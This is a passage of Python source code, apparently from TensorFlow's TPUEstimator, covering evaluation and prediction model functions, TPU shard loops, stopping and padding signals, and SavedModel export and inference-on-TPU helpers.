_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None,
experimental_export_device_assignment=False,
call_context=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
call_context: an optional TPUContext under which the TPU run configuartion
is stored.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params, experimental_export_device_assignment,
call_context)
tensors = call_computation(
features,
computation,
experimental_export_device_assignment=
experimental_export_device_assignment,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params,
experimental_export_device_assignment,
call_context=None):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
if experimental_export_device_assignment and call_context:
# Export the device assignment as part of the model. This is useful for
# model parallel usecases where the model relies on the mapping between
# logical and physical devices.
with call_context.with_mode(_INFERENCE_ON_TPU_MODE) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
if experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
